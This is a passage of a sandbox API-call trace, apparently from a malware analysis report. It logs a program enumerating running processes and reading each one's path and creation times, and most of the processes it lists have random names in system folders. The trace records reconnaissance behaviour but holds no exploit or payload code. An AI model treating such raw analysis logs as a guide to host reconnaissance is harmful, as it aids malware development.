th32ParentProcessID=0x240, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0066.998] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b0) returned 0x184 [0066.998] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" (normalized: "c:\\windows\\systemapps\\shellexperiencehost_cw5n1h2txyewy\\shellexperiencehost.exe")) returned 0x4f [0066.998] wcscpy (in: _Dest=0x196c48, _Source="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" | out: _Dest="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe") returned="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" [0066.998] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0066.998] CloseHandle (hObject=0x184) returned 1 [0066.998] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x240, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0066.999] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa1c) returned 0x184 [0066.999] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" (normalized: "c:\\windows\\systemapps\\microsoft.windows.cortana_cw5n1h2txyewy\\searchui.exe")) returned 0x4a [0066.999] wcscpy (in: _Dest=0x196c48, _Source="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" | out: _Dest="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe") returned="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" [0066.999] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0066.999] CloseHandle (hObject=0x184) returned 1 [0066.999] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="hadgdp.exe")) returned 1 [0067.000] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xec) returned 0x184 [0067.000] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Office 15\\hadgdp.exe" (normalized: "c:\\program files\\microsoft office 15\\hadgdp.exe")) returned 0x2f [0067.000] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files\\Microsoft Office 15\\hadgdp.exe" | out: _Dest="C:\\Program Files\\Microsoft Office 15\\hadgdp.exe") returned="C:\\Program Files\\Microsoft Office 15\\hadgdp.exe" [0067.000] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.000] CloseHandle (hObject=0x184) returned 1 [0067.000] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="mergerbass.exe")) returned 1 [0067.001] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x200) returned 0x184 [0067.001] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Common Files\\mergerbass.exe" (normalized: "c:\\program files (x86)\\common files\\mergerbass.exe")) returned 0x32 [0067.001] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files (x86)\\Common Files\\mergerbass.exe" | out: _Dest="C:\\Program Files (x86)\\Common Files\\mergerbass.exe") returned="C:\\Program Files (x86)\\Common Files\\mergerbass.exe" [0067.001] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.001] CloseHandle (hObject=0x184) returned 1 [0067.001] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x404, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="italianbreakfast.exe")) returned 1 [0067.002] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x404) returned 0x184 [0067.002] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Mail\\italianbreakfast.exe" (normalized: "c:\\program files\\windows mail\\italianbreakfast.exe")) returned 0x32 [0067.002] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files\\Windows Mail\\italianbreakfast.exe" | out: _Dest="C:\\Program Files\\Windows Mail\\italianbreakfast.exe") returned="C:\\Program Files\\Windows Mail\\italianbreakfast.exe" [0067.002] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.002] CloseHandle (hObject=0x184) returned 1 [0067.002] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x520, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="merger raw.exe")) returned 1 [0067.002] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x520) returned 0x184 [0067.002] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Office\\merger raw.exe" (normalized: "c:\\program files\\microsoft office\\merger raw.exe")) returned 0x30 [0067.002] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files\\Microsoft Office\\merger raw.exe" | out: _Dest="C:\\Program Files\\Microsoft Office\\merger raw.exe") returned="C:\\Program Files\\Microsoft Office\\merger raw.exe" [0067.002] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.002] CloseHandle (hObject=0x184) returned 1 [0067.003] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="protein announcements processes.exe")) returned 1 [0067.003] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa24) returned 0x184 [0067.003] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Google\\protein announcements processes.exe" (normalized: "c:\\program files (x86)\\google\\protein announcements processes.exe")) returned 0x41 [0067.003] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files (x86)\\Google\\protein announcements processes.exe" | out: _Dest="C:\\Program Files (x86)\\Google\\protein announcements processes.exe") returned="C:\\Program Files (x86)\\Google\\protein announcements processes.exe" [0067.003] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.003] CloseHandle (hObject=0x184) returned 1 [0067.004] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="cdt_expenditure_vincent.exe")) returned 1 [0067.004] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x418) returned 0x184 [0067.004] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files\\Internet Explorer\\cdt_expenditure_vincent.exe" (normalized: "c:\\program files\\internet explorer\\cdt_expenditure_vincent.exe")) returned 0x3e [0067.004] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files\\Internet Explorer\\cdt_expenditure_vincent.exe" | out: _Dest="C:\\Program Files\\Internet Explorer\\cdt_expenditure_vincent.exe") returned="C:\\Program Files\\Internet Explorer\\cdt_expenditure_vincent.exe" [0067.004] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.004] CloseHandle (hObject=0x184) returned 1 [0067.004] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="woundchristopher.exe")) returned 1 [0067.005] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb00) returned 0x184 [0067.005] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Office 15\\woundchristopher.exe" (normalized: "c:\\program files\\microsoft office 15\\woundchristopher.exe")) returned 0x39 [0067.005] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files\\Microsoft Office 15\\woundchristopher.exe" | out: _Dest="C:\\Program Files\\Microsoft Office 15\\woundchristopher.exe") returned="C:\\Program Files\\Microsoft Office 15\\woundchristopher.exe" [0067.005] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.005] CloseHandle (hObject=0x184) returned 1 [0067.005] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="irrigation_teach.exe")) returned 1 [0067.005] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2d4) returned 0x184 [0067.005] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Portable Devices\\irrigation_teach.exe" (normalized: "c:\\program files\\windows portable devices\\irrigation_teach.exe")) returned 0x3e [0067.006] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files\\Windows Portable Devices\\irrigation_teach.exe" | out: _Dest="C:\\Program Files\\Windows Portable Devices\\irrigation_teach.exe") returned="C:\\Program Files\\Windows Portable Devices\\irrigation_teach.exe" [0067.006] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.006] CloseHandle (hObject=0x184) returned 1 [0067.006] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="suspect promoting stroke.exe")) returned 1 [0067.006] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf0) returned 0x184 [0067.006] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Portable Devices\\suspect promoting stroke.exe" (normalized: "c:\\program files\\windows portable devices\\suspect promoting stroke.exe")) returned 0x46 [0067.006] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files\\Windows Portable Devices\\suspect promoting stroke.exe" | out: _Dest="C:\\Program Files\\Windows Portable Devices\\suspect promoting stroke.exe") returned="C:\\Program Files\\Windows Portable Devices\\suspect promoting stroke.exe" [0067.006] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.006] CloseHandle (hObject=0x184) returned 1 [0067.006] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="piepokemon.exe")) returned 1 [0067.007] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x93c) returned 0x184 [0067.007] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Sidebar\\piepokemon.exe" (normalized: "c:\\program files\\windows sidebar\\piepokemon.exe")) returned 0x2f [0067.007] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files\\Windows Sidebar\\piepokemon.exe" | out: _Dest="C:\\Program Files\\Windows Sidebar\\piepokemon.exe") returned="C:\\Program Files\\Windows Sidebar\\piepokemon.exe" [0067.007] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.007] CloseHandle (hObject=0x184) returned 1 [0067.007] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="fo deutsch.exe")) returned 1 [0067.008] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d0) returned 0x184 [0067.008] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Media Player\\fo deutsch.exe" (normalized: "c:\\program files (x86)\\windows media player\\fo deutsch.exe")) returned 0x3a [0067.008] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files (x86)\\Windows Media Player\\fo deutsch.exe" | out: _Dest="C:\\Program Files (x86)\\Windows Media Player\\fo deutsch.exe") returned="C:\\Program Files (x86)\\Windows Media Player\\fo deutsch.exe" [0067.008] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.008] CloseHandle (hObject=0x184) returned 1 [0067.008] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="complete_paso_altered.exe")) returned 1 [0067.008] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x830) returned 0x184 [0067.008] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Google\\complete_paso_altered.exe" (normalized: "c:\\program files (x86)\\google\\complete_paso_altered.exe")) returned 0x37 [0067.009] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files (x86)\\Google\\complete_paso_altered.exe" | out: _Dest="C:\\Program Files (x86)\\Google\\complete_paso_altered.exe") returned="C:\\Program Files (x86)\\Google\\complete_paso_altered.exe" [0067.009] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.009] CloseHandle (hObject=0x184) returned 1 [0067.009] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="array_matched_latitude.exe")) returned 1 [0067.009] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x504) returned 0x184 [0067.009] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\array_matched_latitude.exe" (normalized: "c:\\program files\\common files\\array_matched_latitude.exe")) returned 0x38 [0067.009] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files\\Common Files\\array_matched_latitude.exe" | out: _Dest="C:\\Program Files\\Common Files\\array_matched_latitude.exe") returned="C:\\Program Files\\Common Files\\array_matched_latitude.exe" [0067.009] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.009] CloseHandle (hObject=0x184) returned 1 [0067.009] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="segments-nhs-bee.exe")) returned 1 [0067.010] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb48) returned 0x184 [0067.010] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Multimedia Platform\\segments-nhs-bee.exe" (normalized: "c:\\program files (x86)\\windows multimedia platform\\segments-nhs-bee.exe")) returned 0x47 [0067.010] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files (x86)\\Windows Multimedia Platform\\segments-nhs-bee.exe" | out: _Dest="C:\\Program Files (x86)\\Windows Multimedia Platform\\segments-nhs-bee.exe") returned="C:\\Program Files (x86)\\Windows Multimedia Platform\\segments-nhs-bee.exe" [0067.010] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.010] CloseHandle (hObject=0x184) returned 1 [0067.010] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x930, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="readily knives.exe")) returned 1 [0067.010] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x930) returned 0x184 [0067.011] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files\\Reference Assemblies\\readily knives.exe" (normalized: "c:\\program files\\reference assemblies\\readily knives.exe")) returned 0x38 [0067.011] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files\\Reference Assemblies\\readily knives.exe" | out: _Dest="C:\\Program Files\\Reference Assemblies\\readily knives.exe") returned="C:\\Program Files\\Reference Assemblies\\readily knives.exe" [0067.011] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.011] CloseHandle (hObject=0x184) returned 1 [0067.011] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="barry_slovenia_won.exe")) returned 1 [0067.011] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc04) returned 0x184 [0067.011] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Portable Devices\\barry_slovenia_won.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\barry_slovenia_won.exe")) returned 0x46 [0067.011] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files (x86)\\Windows Portable Devices\\barry_slovenia_won.exe" | out: _Dest="C:\\Program Files (x86)\\Windows Portable Devices\\barry_slovenia_won.exe") returned="C:\\Program Files (x86)\\Windows Portable Devices\\barry_slovenia_won.exe" [0067.011] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.011] CloseHandle (hObject=0x184) returned 1 [0067.011] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="livearticle.exe")) returned 1 [0067.012] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc20) returned 0x184 [0067.012] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files\\WindowsPowerShell\\livearticle.exe" (normalized: "c:\\program files\\windowspowershell\\livearticle.exe")) returned 0x32 [0067.012] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files\\WindowsPowerShell\\livearticle.exe" | out: _Dest="C:\\Program Files\\WindowsPowerShell\\livearticle.exe") returned="C:\\Program Files\\WindowsPowerShell\\livearticle.exe" [0067.012] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.012] CloseHandle (hObject=0x184) returned 1 [0067.012] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="inn_creation.exe")) returned 1 [0067.013] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc44) returned 0x184 [0067.013] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Journal\\inn_creation.exe" (normalized: "c:\\program files\\windows journal\\inn_creation.exe")) returned 0x31 [0067.013] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files\\Windows Journal\\inn_creation.exe" | out: _Dest="C:\\Program Files\\Windows Journal\\inn_creation.exe") returned="C:\\Program Files\\Windows Journal\\inn_creation.exe" [0067.013] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.013] CloseHandle (hObject=0x184) returned 1 [0067.013] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="demand_sony_leeds.exe")) returned 1 [0067.013] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc5c) returned 0x184 [0067.013] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files\\Reference Assemblies\\demand_sony_leeds.exe" (normalized: "c:\\program files\\reference assemblies\\demand_sony_leeds.exe")) returned 0x3b [0067.014] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files\\Reference Assemblies\\demand_sony_leeds.exe" | out: _Dest="C:\\Program Files\\Reference Assemblies\\demand_sony_leeds.exe") returned="C:\\Program Files\\Reference Assemblies\\demand_sony_leeds.exe" [0067.014] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.014] CloseHandle (hObject=0x184) returned 1 [0067.014] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="optimize-dressing.exe")) returned 1 [0067.014] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc70) returned 0x184 [0067.014] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Mail\\optimize-dressing.exe" (normalized: "c:\\program files (x86)\\windows mail\\optimize-dressing.exe")) returned 0x39 [0067.014] wcscpy (in: _Dest=0x196c48, _Source="C:\\Program Files (x86)\\Windows Mail\\optimize-dressing.exe" | out: _Dest="C:\\Program Files (x86)\\Windows Mail\\optimize-dressing.exe") returned="C:\\Program Files (x86)\\Windows Mail\\optimize-dressing.exe" [0067.014] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.014] CloseHandle (hObject=0x184) returned 1 [0067.014] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf18, 